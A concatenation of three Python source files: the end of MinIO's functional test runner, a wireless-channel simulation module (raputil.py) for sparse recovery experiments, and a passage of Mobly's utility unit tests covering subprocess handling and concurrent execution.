for err in errs:
raise ValueError("Remove objects err: {}".format(err))
_CLIENT.remove_bucket(bucket_name)
def test_remove_objects(log_entry):
"""Test remove_objects()."""
_test_remove_objects(log_entry)
def test_remove_object_versions(log_entry):
"""Test remove_objects()."""
_test_remove_objects(log_entry, version_check=True)
def test_remove_bucket(log_entry):
"""Test remove_bucket()."""
# Get a unique bucket_name
bucket_name = _gen_bucket_name()
if _IS_AWS:
bucket_name += ".unique"
log_entry["args"] = {
"bucket_name": bucket_name,
}
if _IS_AWS:
log_entry["args"]["location"] = location = "us-east-1"
_CLIENT.make_bucket(bucket_name, location)
else:
_CLIENT.make_bucket(bucket_name)
# Removing bucket. This operation will only work if your bucket is empty.
_CLIENT.remove_bucket(bucket_name)
def main():
"""
Functional testing of minio python library.
"""
# pylint: disable=global-statement
global _CLIENT, _TEST_FILE, _LARGE_FILE, _IS_AWS
access_key = os.getenv('ACCESS_KEY')
secret_key = os.getenv('SECRET_KEY')
server_endpoint = os.getenv('SERVER_ENDPOINT', 'play.min.io')
secure = os.getenv('ENABLE_HTTPS', '1') == '1'
if server_endpoint == 'play.min.io':
access_key = 'Q3AM3UQ867SPQQA43P2F'
secret_key = 'zuf+tfteSlswRu7BJ86wekitnifILbZam1KYY3TG'
secure = True
_CLIENT = Minio(server_endpoint, access_key, secret_key, secure=secure)
_IS_AWS = ".amazonaws.com" in server_endpoint
# Check if we are running in the mint environment.
data_dir = os.getenv('DATA_DIR', '/mint/data')
is_mint_env = (
os.path.exists(data_dir) and
os.path.exists(os.path.join(data_dir, 'datafile-1-MB')) and
os.path.exists(os.path.join(data_dir, 'datafile-11-MB'))
)
# Enable trace
# _CLIENT.trace_on(sys.stderr)
_TEST_FILE = 'datafile-1-MB'
_LARGE_FILE = 'datafile-11-MB'
if is_mint_env:
# Choose data files
_TEST_FILE = os.path.join(data_dir, 'datafile-1-MB')
_LARGE_FILE = os.path.join(data_dir, 'datafile-11-MB')
else:
with open(_TEST_FILE, 'wb') as file_data:
shutil.copyfileobj(LimitedRandomReader(1 * MB), file_data)
with open(_LARGE_FILE, 'wb') as file_data:
shutil.copyfileobj(LimitedRandomReader(11 * MB), file_data)
ssec = None
if secure:
# Create a Customer Key of 32 Bytes for Server Side Encryption (SSE-C)
cust_key = b'AABBCCDDAABBCCDDAABBCCDDAABBCCDD'
# Create an SSE-C object with provided customer key
ssec = SseCustomerKey(cust_key)
if os.getenv("MINT_MODE") == "full":
tests = {
test_make_bucket_default_region: None,
test_make_bucket_with_region: None,
test_negative_make_bucket_invalid_name: None,
test_list_buckets: None,
test_fput_object_small_file: {"sse": ssec} if ssec else None,
test_fput_object_large_file: {"sse": ssec} if ssec else None,
test_fput_object_with_content_type: None,
test_copy_object_no_copy_condition: {
"ssec_copy": ssec, "ssec": ssec} if ssec else None,
test_copy_object_etag_match: None,
test_copy_object_with_metadata: None,
test_copy_object_negative_etag_match: None,
test_copy_object_modified_since: None,
test_copy_object_unmodified_since: None,
test_put_object: {"sse": ssec} if ssec else None,
test_negative_put_object_with_path_segment: None,
test_stat_object: {"sse": ssec} if ssec else None,
test_stat_object_version: {"sse": ssec} if ssec else None,
test_get_object: {"sse": ssec} if ssec else None,
test_get_object_version: {"sse": ssec} if ssec else None,
test_fget_object: {"sse": ssec} if ssec else None,
test_fget_object_version: {"sse": ssec} if ssec else None,
test_get_object_with_default_length: None,
test_get_partial_object: {"sse": ssec} if ssec else None,
test_list_objects_v1: None,
test_list_object_v1_versions: None,
test_list_objects_with_prefix: None,
test_list_objects_with_1001_files: None,
test_list_objects: None,
test_list_object_versions: None,
test_presigned_get_object_default_expiry: None,
test_presigned_get_object_expiry: None,
test_presigned_get_object_response_headers: None,
test_presigned_get_object_version: None,
test_presigned_put_object_default_expiry: None,
test_presigned_put_object_expiry: None,
test_presigned_post_policy: None,
test_thread_safe: None,
test_get_bucket_policy: None,
test_set_bucket_policy_readonly: None,
test_set_bucket_policy_readwrite: None,
test_get_bucket_notification: None,
test_select_object_content: None,
}
else:
tests = {
test_make_bucket_default_region: None,
test_list_buckets: None,
test_put_object: {"sse": ssec} if ssec else None,
test_stat_object: {"sse": ssec} if ssec else None,
test_stat_object_version: {"sse": ssec} if ssec else None,
test_get_object: {"sse": ssec} if ssec else None,
test_get_object_version: {"sse": ssec} if ssec else None,
test_list_objects: None,
test_presigned_get_object_default_expiry: None,
test_presigned_put_object_default_expiry: None,
test_presigned_post_policy: None,
test_copy_object_no_copy_condition: {
"ssec_copy": ssec, "ssec": ssec} if ssec else None,
test_select_object_content: None,
test_get_bucket_policy: None,
test_set_bucket_policy_readonly: None,
test_get_bucket_notification: None,
}
tests.update(
{
test_remove_object: None,
test_remove_object_version: None,
test_remove_objects: None,
test_remove_object_versions: None,
test_remove_bucket: None,
},
)
for test_name, arg_list in tests.items():
args = ()
kwargs = {}
_call_test(test_name, *args, **kwargs)
if arg_list:
args = ()
kwargs = arg_list
_call_test(test_name, *args, **kwargs)
# Remove temporary files.
if not is_mint_env:
os.remove(_TEST_FILE)
os.remove(_LARGE_FILE)
if __name__ == "__main__":
try:
main()
except TestFailed:
sys.exit(1)
except Exception as exc: # pylint: disable=broad-except
print(exc)
sys.exit(-1)
|
raputil.py
|
#!/usr/bin/python
from __future__ import division
import numpy as np
import math
import os
import time
import numpy.linalg as la
from tfinterp import interp1d_
sqrt=np.sqrt
pi = math.pi
def hexagonal_uniform(N,as_complex=False):
'returns uniformly distributed points of shape=(2,N) within a hexagon whose minimum radius is 1.0'
phi = 2*pi/6 *.5
S = np.array( [[1,1],np.tan([phi,-phi])] ) # vectors to vertices of next hexagon ( centered at (2,0) )
# uniformly sample the parallelogram defined by the columns of S
v = np.matmul(S,np.random.uniform(0,1,(2,N)))
v[0] = 1 - abs(v[0]-1) # fold back to make a triangle
c = (v[0] + 1j*v[1]) * np.exp( 2j*pi/6*np.floor( np.random.uniform(0,6,N) ) ) # rotate to a random sextant
if as_complex:
return c
else:
return np.array( (c.real,c.imag) )
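# Minimal usage sketch (illustrative only, not used elsewhere): draw samples
# and confirm they lie inside the hexagon, i.e. within the circumradius
# 1/cos(pi/6) and, along each of the six face normals, within the minimum
# radius of 1.0.
def _check_hexagonal_uniform(n=10000):
    c = hexagonal_uniform(n, as_complex=True)
    assert np.all(abs(c) <= 1.0 / math.cos(pi / 6) + 1e-9)  # inside circumradius
    for k in range(6):  # projection onto each face normal never exceeds 1.0
        assert np.all((c * np.exp(-2j * pi * k / 6)).real <= 1.0 + 1e-9)
    return c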
def left_least_squares(x,y,rcond=-1,fast=False):
'find the A that best fits y-A*x'
if fast:
return la.lstsq( np.matmul(x,x.T) ,np.matmul(x,y.T) ,rcond=rcond )[0].T # faster, but less stable
else:
return la.lstsq( x.T,y.T,rcond=rcond)[0].T
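# Quick illustrative check (assumed usage) of left_least_squares: recover a
# mixing matrix A from y = A*x observed in light noise; the stable path and
# the normal-equation "fast" path should agree closely on well-conditioned data.
def _check_left_least_squares(m=8, n=4, samples=2000, noise=1e-3):
    A = np.random.normal(size=(m, n))
    x = np.random.normal(size=(n, samples))
    y = np.matmul(A, x) + noise * np.random.normal(size=(m, samples))
    A_hat = left_least_squares(x, y)
    A_fast = left_least_squares(x, y, fast=True)
    assert la.norm(A_hat - A) / la.norm(A) < 0.05
    assert la.norm(A_fast - A_hat) / la.norm(A_hat) < 1e-3
    return A_hat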
def rms(x,axis=None):
'calculate the root-mean-square of a signal; if axis is not None, the reduction is only along the given axis/axes'
if np.iscomplexobj(x):
x=abs(x)
return np.sqrt(np.mean(np.square(x),axis) )
def nlfunc(r,sc,grid,gg,return_gradient=True):
'returns xhat_nl = rhat_nl * interp( rhat_nl / sc,grid,gg) and optionally the gradient of xhat_nl wrt rhat_nl'
g = r * np.interp(r/sc,grid,gg)
if return_gradient:
#I had some code that computed the gradient, but it was far more complicated and no faster than just computing the empirical gradient
# technically, this computes a subgradient
dr = sc * (grid[1]-grid[0]) * 1e-3
dgdr = (nlfunc(r+.5*dr,sc,grid,gg,False) - nlfunc(r-.5*dr,sc,grid,gg,False)) / dr
return (g,dgdr)
else:
return g
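# Illustrative sketch (assumed table values) of nlfunc: the denoiser output is
# r * interp(r/sc, grid, gg) and the reported gradient is a central finite
# difference, so for a constant table gg == 0.5 the output is 0.5*r and the
# gradient is ~0.5 everywhere.
def _check_nlfunc():
    grid = np.linspace(0.0, 10.0, 101)
    gg = np.full_like(grid, 0.5)
    r = np.linspace(0.1, 5.0, 50)
    g, dgdr = nlfunc(r, 1.0, grid, gg, return_gradient=True)
    assert np.allclose(g, 0.5 * r)
    assert np.allclose(dgdr, 0.5, atol=1e-6)
    return g, dgdr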
def nlfunc_(r_,sc_,grid,gg_,return_gradient=True):
'returns xhat_nl = rhat_nl * interp( rhat_nl / sc,grid,gg) and optionally the gradient of xhat_nl wrt rhat_nl'
g_ = r_ * interp1d_(r_/sc_,grid,gg_)
if return_gradient:
#I had some code that computed the gradient, but it was far more complicated and no faster than just computing the empirical gradient
# technically, this computes a subgradient
dr_ = sc_ * (grid[1]-grid[0]) * 1e-3
dgdr_ = (nlfunc_(r_+.5*dr_,sc_,grid,gg_,False) - nlfunc_(r_-.5*dr_,sc_,grid,gg_,False)) / dr_
return (g_,dgdr_)
else:
return g_
def crandn(shape,set_mag=None):
'circular symmetric Gaussian with variance 2 (real,imag each being var=1) '
X= np.random.normal( size=tuple(shape)+(2,)).view(np.complex128)[...,0]
if set_mag is not None:
X = X *set_mag / abs(X)
return X
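# Small sanity sketch (illustrative) for crandn: samples are circularly
# symmetric complex Gaussian with total variance 2 (real and imaginary parts
# each of unit variance), and set_mag pins every sample to the given magnitude.
def _check_crandn(n=100000):
    X = crandn((n,))
    assert abs(np.var(X.real) - 1.0) < 0.05
    assert abs(np.var(X.imag) - 1.0) < 0.05
    Xm = crandn((n,), set_mag=2.0)
    assert np.allclose(abs(Xm), 2.0)
    return X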
def random_qpsk( *shape):
return ((np.random.uniform( -1,1,size=shape+(2,) ) > 0)*2-1).astype(np.float32).view(np.complex64)[...,0]
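# Illustrative check for random_qpsk: every sample lies on the QPSK
# constellation {+-1 +- 1j} and is returned as complex64.
def _check_random_qpsk(n=1000):
    q = random_qpsk(n)
    assert q.dtype == np.complex64
    assert np.all(np.isin(q.real, (-1.0, 1.0)))
    assert np.all(np.isin(q.imag, (-1.0, 1.0)))
    return q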
class Problem(object):
@staticmethod
def scenario1():
return dict(Nr=1,C=1,Nu=512,Ns=64,beta=.01,SNR_dB=10.0,L=5,ang=10,rice_k_dB=10,ple=4,mmv2d=True,normS=1)
@staticmethod
def scenario2():
return dict(Nr=64,C=7,Nu=64,Ns=64,beta=1,SNR_dB=20.0,L=5,ang=10,rice_k_dB=10,ple=4,mmv2d=True,normS=1)
def __init__(self, Nr=64, C=7, Nu=64, Ns=64, beta=.01,L=5,ang=10,rice_k_dB=10,ple=4,SNR_dB=10.0,ambig=False,scramble=False,S=None,cpx=False,mmv2d=False,normS=None):
"""
Nr : number of Rx antennas
C : number of cells (>1 indicates there are "far" users)
Nu : max # users per cell
Ns : spreading code length
beta : user load (i.e.,expected active / total user ratio)
L : paths per cluster
ang : angular spread within cluster (in degrees)
rice_k_dB : rice k parameter in dB
ple : path-loss exponent: gain = 1/(1+d^ple) for distance d
S : set of spreading codes, shape=(Ns,C*Nu) """
if S is None:
S = random_qpsk(Ns,C*Nu)
self.Nr = Nr
self.C = C
self.Nu = Nu
self.Ns = Ns
self.beta = beta
self.L = L
self.ang = ang
self.rice_k_dB = rice_k_dB
self.ple = ple
self.SNR_dB = SNR_dB
self.ambig = ambig
self.scramble = scramble
self.cpx = cpx
self.mmv2d = mmv2d
if self.cpx == np.iscomplexobj(S):
self.S = S
else:
if not self.cpx:
top = np.concatenate( (S.real, -S.imag),axis=1 )
btm = np.concatenate( (S.imag, S.real),axis=1 )
self.S = np.concatenate( (top,btm),axis=0 )
else:
assert False,'WHY!?'
if self.cpx:
assert self.S.shape == (Ns,C*Nu)
else:
assert self.S.shape == (2*Ns,2*C*Nu)
if normS is not None:
dnorm = np.asarray(normS) / np.sqrt( np.square(self.S).sum(axis=0) )
self.S = self.S * dnorm
self.timegen = 0 # time spent waiting for generation of YX (does NOT count subprocess CPU time if nsubprocs>0)
def genX(self,batches=1):
"""generate one or more batches(i.e. random draws) of active users with Ricean channels
batches : number of independent realizations to generate
If cpx, the returned X has shape (batches,C*Nu,Nr),
otherwise (batches,2*C*Nu,Nr)
"""
Nr,C,Nu,Ns,S = self.Nr,self.C,self.Nu,self.Ns,self.S
L,ang,rice_k_dB,ple = self.L,self.ang,self.rice_k_dB,self.ple
X = np.zeros((batches,C,Nu,Nr),dtype=np.complex64)
for i in range(batches):
for c in range(C):  # c==0 indicates all users are in the base station's cell ("near")
###################################
# choose how many and which users are active in this cell
K = np.random.binomial(Nu,self.beta) # number of active users in this cell E[K] = Nu*beta
active_users = np.random.permutation(Nu)[:K]
#NOTE: Tensors below have shape (user,path,angle), until Z when we sum the path dimension.
# how far (weak) is each user?
if c==0:
dist = abs( hexagonal_uniform( K ,as_complex=True) )
elif 0<c<7:
dist = abs( 2+hexagonal_uniform( K ,as_complex=True) )
else:
assert False,'assuming 1 or 7 hexagonal cells'
dist.shape = (K,1,1)
gain = 1/(1+dist**ple)
# The L paths per user impinge on our linear array with clustered angles theta.
# All paths per user start at theta0 and are uniformly distributed in the next `ang` degrees.
# (theta units=radians,zero means broadside to the linear array)
theta0 = np.random.uniform(0,2*pi,(K,1,1))
theta = np.mod( theta0 + np.random.uniform(0,ang*pi/180,(K,L,1)) ,2*pi)
# different Ricean gains for each of the paths
direct_path = crandn((K,1,1),set_mag=1.0) # one dominant path component
other_paths = 10**(-rice_k_dB/20)*sqrt(.5)*crandn((K,L,1))
# each of the different paths impinges onto our linear array according to the array spacing and theta
E = gain*(direct_path + other_paths) * np.exp(1j* theta * np.arange(Nr) )
# sum the different paths, Z.shape is (user,angle)
Z = E.sum(axis=1)
if np.isnan(Z).any():
raise RuntimeError()
# update the data set for these users' signal
X[i,c,active_users] = np.fft.fft(Z,Nr,axis=-1)/Nr
###################################
# collapse the C and Nu dimensions into one
X.shape = (batches,C*Nu,Nr)
if self.ambig:
X = X[:,np.random.permutation(C*Nu),:]
if not self.cpx:
X2 = np.empty( (batches,2*C*Nu,Nr),np.float32)
X2[:,:C*Nu,:] = X.real
X2[:,C*Nu:,:] = X.imag
X = X2
if self.scramble:
shp = X.shape
X = np.random.permutation(X.ravel())
X.shape = shp
if self.mmv2d:
# the "sample vector" dimension should remain in second-to-last dimension
N = X.shape[-2]
X = np.reshape( np.transpose(X,(1,0,2)) ,(N,-1) )
return X
def fwd(self,X):
'forward linear operator'
assert np.iscomplexobj(X) == self.cpx,'wrong value for cpx in constructor'
return np.einsum('...jk,mj->...mk',X,self.S)
def adj(self,X):
'adjoint linear operator'
assert np.iscomplexobj(X) == self.cpx,'wrong value for cpx in constructor'
return np.einsum('...jk,mj->...mk',X,self.S.T.conj())
def add_noise(self,Y0):
'add noise at the given SNR, returns Y0+W,wvar'
wvar = (la.norm(Y0)**2/Y0.size) * 10**(-self.SNR_dB/10)
if self.cpx:
Y =(Y0 + crandn(Y0.shape) * sqrt(wvar/2)).astype(np.complex64,copy=False)
else:
Y = (Y0 + np.random.normal(scale=sqrt(wvar),size=Y0.shape) ).astype(np.float32,copy=False)
return Y,wvar
def genYX(self,batches=1,nsubprocs=None):
t0 = time.time()
if nsubprocs is None:
X = self.genX(batches)
Y0 = self.fwd(X)
Y,_ = self.add_noise(Y0)
else:
if not hasattr(self,'qgen'):
import multiprocessing as mp
self.qgen = mp.Queue(maxsize=nsubprocs) # one slot per subprocess
def makesets():
np.random.seed() #MUST reseed or every subprocess will generate the same data
while True:
X = self.genX(batches)
Y0 = self.fwd(X)
Y,_ = self.add_noise(Y0)
self.qgen.put((Y,X),block=True)
self.subprocs = []
for i in range(nsubprocs):
prc = mp.Process(target=makesets)
prc.daemon=True
prc.start()
self.subprocs.append(prc)
Y,X = self.qgen.get(True)
et = time.time() - t0
self.timegen += et
return (Y,X)
def kill_subprocs(self):
if hasattr(self,'qgen') and hasattr(self,'subprocs'):
for prc in self.subprocs:
prc.terminate()
prc.join()
del self.qgen
del self.subprocs
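# Minimal sketch (not used by Problem itself) of the producer pattern genYX
# relies on when nsubprocs is given: daemon worker processes reseed numpy
# (otherwise every fork replays the parent's RNG state and emits identical
# batches) and push (Y, X) pairs into a bounded queue that the consumer drains.
# Assumes the 'fork' start method (as genYX above does), since the worker is a
# local closure.
def _example_subprocess_generation(prob, batches=32, nworkers=2):
    import multiprocessing as mp
    queue = mp.Queue(maxsize=nworkers)  # bounded: workers block when it is full
    def worker():
        np.random.seed()  # reseed per process so draws are independent
        while True:
            X = prob.genX(batches)
            Y, _ = prob.add_noise(prob.fwd(X))
            queue.put((Y, X), block=True)
    procs = [mp.Process(target=worker, daemon=True) for _ in range(nworkers)]
    for prc in procs:
        prc.start()
    Y, X = queue.get(True)  # take one batch; workers keep refilling the queue
    for prc in procs:
        prc.terminate()
    return Y, X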
if __name__ == '__main__':
import unittest
class RapTest(unittest.TestCase):
def _test_awgn(self,cpx):
snr = np.random.uniform(3,20)
p = Problem(cpx=cpx,SNR_dB=snr)
X = p.genX(5)
self.assertEqual( np.iscomplexobj(X) , cpx )
Y0 = p.fwd(X)
self.assertEqual( np.iscomplexobj(Y0) , cpx )
Y,wvar = p.add_noise(Y0)
self.assertEqual( np.iscomplexobj(Y) , cpx )
snr_obs = -20*np.log10( la.norm(Y-Y0)/la.norm(Y0))
self.assertTrue( abs(snr-snr_obs) < 1.0, 'gross error in add_noise')
wvar_obs = la.norm(Y0-Y)**2/Y.size
self.assertTrue( .5 < wvar_obs/wvar < 1.5, 'gross error in add_noise wvar')
def test_awgn_cpx(self):
self._test_awgn(True)
def test_awgn_real(self):
self._test_awgn(False)
unittest.main(verbosity=2)
#exec(open(os.environ['PYTHONSTARTUP']).read(),globals(),globals())
|
utils_test.py
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from concurrent import futures
import io
import logging
import multiprocessing
import os
import platform
import shutil
import signal
import socket
import subprocess
import sys
import tempfile
import threading
import time
import unittest
from unittest import mock
from mobly import base_test
from mobly import signals
from mobly import test_runner
from mobly import utils
from tests.lib import integration_test
from tests.lib import mock_controller
from tests.lib import mock_instrumentation_test
from tests.lib import multiple_subclasses_module
MOCK_AVAILABLE_PORT = 5
ADB_MODULE_PACKAGE_NAME = 'mobly.controllers.android_device_lib.adb'
def _is_process_running(pid):
"""Whether the process with given PID is running."""
if os.name == 'nt':
return str(pid) in subprocess.check_output([
'tasklist',
'/fi',
f'PID eq {pid}',
]).decode()
try:
# os.kill throws OSError if the process with PID pid is not running.
# signal.SIG_DFL is one of the two standard signal handling options; it
# simply performs the default action for the signal.
os.kill(pid, signal.SIG_DFL)
except OSError:
return False
return True
def _fork_children_processes(name, successors):
"""Forks children processes and its descendants recursively.
Args:
name: The name of this process.
successors: The args for the descendant processes.
"""
logging.info('Process "%s" started, PID: %d!', name, os.getpid())
children_process = [
multiprocessing.Process(target=_fork_children_processes, args=args)
for args in successors
]
for child_process in children_process:
child_process.start()
if 'child' in name:
time.sleep(4)
for child_process in children_process:
child_process.join()
logging.info('Process "%s" exit.', name)
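# A hedged sketch (not Mobly's actual implementation) of the breadth-first
# collection that the process-tree tests in UtilsTest below emulate with
# mocks: repeatedly ask `ps` for the children of each PID until no more
# descendants are reported; the root PID itself is not included.
def _example_collect_process_tree(root_pid):
    pids, queue = [], [root_pid]
    while queue:
        pid = queue.pop(0)
        try:
            out = subprocess.check_output(
                ['ps', '-o', 'pid', '--ppid', str(pid), '--noheaders'])
        except subprocess.CalledProcessError:
            continue  # `ps` exits non-zero when a PID has no children
        children = [int(token) for token in out.split()]
        pids.extend(children)
        queue.extend(children)
    return pids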
class UtilsTest(unittest.TestCase):
"""Unit tests for the implementation of everything under mobly.utils."""
def setUp(self):
super().setUp()
self.tmp_dir = tempfile.mkdtemp()
def tearDown(self):
super().tearDown()
shutil.rmtree(self.tmp_dir)
def sleep_cmd(self, wait_secs):
if platform.system() == 'Windows':
python_code = ['import time', 'time.sleep(%s)' % wait_secs]
return ['python', '-c', 'exec("%s")' % r'\r\n'.join(python_code)]
else:
return ['sleep', str(wait_secs)]
@unittest.skipIf(os.name == "nt",
'collect_process_tree only available on Unix-like systems.')
@mock.patch('subprocess.check_output')
def test_collect_process_tree_without_child(self, mock_check_output):
mock_check_output.side_effect = (subprocess.CalledProcessError(
-1, 'fake_cmd'))
pid_list = utils._collect_process_tree(123)
self.assertListEqual(pid_list, [])
@unittest.skipIf(os.name == "nt",
'collect_process_tree only available on Unix-like systems.')
@mock.patch('subprocess.check_output')
def test_collect_process_tree_returns_list(self, mock_check_output):
# Creates subprocess 777 with descendants looks like:
# subprocess 777
# ├─ 780 (child)
# │ ├─ 888 (grandchild)
# │ │ ├─ 913 (great grandchild)
# │ │ └─ 999 (great grandchild)
# │ └─ 890 (grandchild)
# ├─ 791 (child)
# └─ 799 (child)
mock_check_output.side_effect = (
# ps -o pid --ppid 777 --noheaders
b'780\n 791\n 799\n',
# ps -o pid --ppid 780 --noheaders
b'888\n 890\n',
# ps -o pid --ppid 791 --noheaders
subprocess.CalledProcessError(-1, 'fake_cmd'),
# ps -o pid --ppid 799 --noheaders
subprocess.CalledProcessError(-1, 'fake_cmd'),
# ps -o pid --ppid 888 --noheaders
b'913\n 999\n',
# ps -o pid --ppid 890 --noheaders
subprocess.CalledProcessError(-1, 'fake_cmd'),
# ps -o pid --ppid 913 --noheaders
subprocess.CalledProcessError(-1, 'fake_cmd'),
# ps -o pid --ppid 999 --noheaders
subprocess.CalledProcessError(-1, 'fake_cmd'),
)
pid_list = utils._collect_process_tree(777)
self.assertListEqual(pid_list, [780, 791, 799, 888, 890, 913, 999])
@mock.patch.object(os, 'kill')
@mock.patch.object(utils, '_collect_process_tree')
def test_kill_process_tree_on_unix_succeeds(self, mock_collect_process_tree,
mock_os_kill):
mock_collect_process_tree.return_value = [799, 888, 890]
mock_proc = mock.MagicMock()
mock_proc.pid = 123
with mock.patch.object(os, 'name', new='posix'):
utils._kill_process_tree(mock_proc)
mock_os_kill.assert_has_calls([
mock.call(799, signal.SIGTERM),
mock.call(888, signal.SIGTERM),
mock.call(890, signal.SIGTERM),
])
mock_proc.kill.assert_called_once()
@mock.patch.object(os, 'kill')
@mock.patch.object(utils, '_collect_process_tree')
def test_kill_process_tree_on_unix_kill_children_failed_throws_error(
self, mock_collect_process_tree, mock_os_kill):
mock_collect_process_tree.return_value = [799, 888, 890]
mock_os_kill.side_effect = [None, OSError(), None]
mock_proc = mock.MagicMock()
mock_proc.pid = 123
with mock.patch.object(os, 'name', new='posix'):
with self.assertRaises(utils.Error):
utils._kill_process_tree(mock_proc)
mock_proc.kill.assert_called_once()
@mock.patch.object(utils, '_collect_process_tree')
def test_kill_process_tree_on_unix_kill_proc_failed_throws_error(
self, mock_collect_process_tree):
mock_collect_process_tree.return_value = []
mock_proc = mock.MagicMock()
mock_proc.pid = 123
mock_proc.kill.side_effect = subprocess.SubprocessError()
with mock.patch.object(os, 'name', new='posix'):
with self.assertRaises(utils.Error):
utils._kill_process_tree(mock_proc)
mock_proc.kill.assert_called_once()
@mock.patch('subprocess.check_output')
def test_kill_process_tree_on_windows_calls_taskkill(self, mock_check_output):
mock_proc = mock.MagicMock()
mock_proc.pid = 123
with mock.patch.object(os, 'name', new='nt'):
utils._kill_process_tree(mock_proc)
mock_check_output.assert_called_once_with([
'taskkill',
'/F',
'/T',
'/PID',
'123',
])
def test_run_command(self):
ret, _, _ = utils.run_command(self.sleep_cmd(0.01))
self.assertEqual(ret, 0)
def test_run_command_with_timeout(self):
ret, _, _ = utils.run_command(self.sleep_cmd(0.01), timeout=4)
self.assertEqual(ret, 0)
def test_run_command_with_timeout_expired(self):
with self.assertRaisesRegex(subprocess.TimeoutExpired, 'sleep'):
_ = utils.run_command(self.sleep_cmd(4), timeout=0.01)
@mock.patch('threading.Timer')
@mock.patch('subprocess.Popen')
def test_run_command_with_default_params(self, mock_popen, mock_timer):
mock_command = mock.MagicMock(spec=dict)
mock_proc = mock_popen.return_value
mock_proc.communicate.return_value = ('fake_out', 'fake_err')
mock_proc.returncode = 0
out = utils.run_command(mock_command)
self.assertEqual(out, (0, 'fake_out', 'fake_err'))
mock_popen.assert_called_with(
mock_command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=False,
cwd=None,
env=None,
universal_newlines=False,
)
mock_timer.assert_not_called()
@mock.patch('threading.Timer')
@mock.patch('subprocess.Popen')
def test_run_command_with_custom_params(self, mock_popen, mock_timer):
mock_command = mock.MagicMock(spec=dict)
mock_stdout = mock.MagicMock(spec=int)
mock_stderr = mock.MagicMock(spec=int)
mock_shell = mock.MagicMock(spec=bool)
mock_timeout = 1234
mock_env = mock.MagicMock(spec=dict)
mock_universal_newlines = mock.MagicMock(spec=bool)
mock_proc = mock_popen.return_value
mock_proc.communicate.return_value = ('fake_out', 'fake_err')
mock_proc.returncode = 127
out = utils.run_command(mock_command,
stdout=mock_stdout,
stderr=mock_stderr,
shell=mock_shell,
timeout=mock_timeout,
env=mock_env,
universal_newlines=mock_universal_newlines)
self.assertEqual(out, (127, 'fake_out', 'fake_err'))
mock_popen.assert_called_with(
mock_command,
stdout=mock_stdout,
stderr=mock_stderr,
shell=mock_shell,
cwd=None,
env=mock_env,
universal_newlines=mock_universal_newlines,
)
mock_timer.assert_called_with(1234, mock.ANY)
def test_run_command_with_universal_newlines_false(self):
_, out, _ = utils.run_command(self.sleep_cmd(0.01),
universal_newlines=False)
self.assertIsInstance(out, bytes)
def test_run_command_with_universal_newlines_true(self):
_, out, _ = utils.run_command(self.sleep_cmd(0.01), universal_newlines=True)
self.assertIsInstance(out, str)
def test_start_standing_subproc(self):
try:
p = utils.start_standing_subprocess(self.sleep_cmd(4))
self.assertTrue(_is_process_running(p.pid))
os.kill(p.pid, signal.SIGTERM)
finally:
p.stdout.close()
p.stderr.close()
p.wait()
@mock.patch('subprocess.Popen')
def test_start_standing_subproc_without_env(self, mock_popen):
utils.start_standing_subprocess(self.sleep_cmd(0.01))
mock_popen.assert_called_with(
self.sleep_cmd(0.01),
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=False,
env=None,
)
@mock.patch('subprocess.Popen')
def test_start_standing_subproc_with_custom_env(self, mock_popen):
mock_env = mock.MagicMock(spec=dict)
utils.start_standing_subprocess(self.sleep_cmd(0.01), env=mock_env)
mock_popen.assert_called_with(
self.sleep_cmd(0.01),
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=False,
env=mock_env,
)
def test_stop_standing_subproc(self):
p = utils.start_standing_subprocess(self.sleep_cmd(4))
utils.stop_standing_subprocess(p)
self.assertFalse(_is_process_running(p.pid))
def test_stop_standing_subproc_without_pipe(self):
p = subprocess.Popen(self.sleep_cmd(4))
self.assertIsNone(p.stdout)
utils.stop_standing_subprocess(p)
self.assertFalse(_is_process_running(p.pid))
def test_stop_standing_subproc_and_descendants(self):
# Creates subprocess A with descendants looks like:
# subprocess A
# ├─ B (child)
# │ ├─ X (grandchild)
# │ │ ├─ 1 (great grandchild)
# │ │ └─ 2 (great grandchild)
# │ └─ Y (grandchild)
# ├─ C (child)
# └─ D (child)
process_tree_args = ('subprocess_a', [
('child_b', [
('grand_child_x', [
('great_grand_child_1', []),
('great_grand_child_2', []),
]),
('grand_child_y', []),
]),
('child_c', []),
('child_d', []),
])
subprocess_a = multiprocessing.Process(target=_fork_children_processes,
args=process_tree_args)
subprocess_a.start()
mock_subprocess_a_popen = mock.MagicMock()
mock_subprocess_a_popen.pid = subprocess_a.pid
# Sleep a while to create all processes.
time.sleep(0.01)
utils.stop_standing_subprocess(mock_subprocess_a_popen)
subprocess_a.join(timeout=1)
mock_subprocess_a_popen.wait.assert_called_once()
@unittest.skipIf(sys.version_info >= (3, 4) and sys.version_info < (3, 5),
'Python 3.4 does not support `None` max_workers.')
def test_concurrent_exec_when_none_workers(self):
def adder(a, b):
return a + b
with mock.patch.object(futures,
'ThreadPoolExecutor',
wraps=futures.ThreadPoolExecutor) as thread_pool_spy:
results = utils.concurrent_exec(adder, [(1, 1), (2, 2)], max_workers=None)
thread_pool_spy.assert_called_once_with(max_workers=None)
self.assertEqual(len(results), 2)
self.assertIn(2, results)
self.assertIn(4, results)
def test_concurrent_exec_when_default_max_workers(self):
def adder(a, b):
return a + b
with mock.patch.object(futures,
'ThreadPoolExecutor',
wraps=futures.ThreadPoolExecutor) as thread_pool_spy:
results = utils.concurrent_exec(adder, [(1, 1), (2, 2)])
thread_pool_spy.assert_called_once_with(max_workers=30)
self.assertEqual(len(results), 2)
self.assertIn(2, results)
self.assertIn(4, results)
def test_concurrent_exec_when_custom_max_workers(self):
def adder(a, b):
return a + b
with mock.patch.object(futures,
'ThreadPoolExecutor',
wraps=futures.ThreadPoolExecutor) as thread_pool_spy:
results = utils.concurrent_exec(adder, [(1, 1), (2, 2)], max_workers=1)
thread_pool_spy.assert_called_once_with(max_workers=1)
self.assertEqual(len(results), 2)
self.assertIn(2, results)
self.assertIn(4, results)
def test_concurrent_exec_makes_all_calls(self):
mock_function = mock.MagicMock()
_ = utils.concurrent_exec(mock_function, [
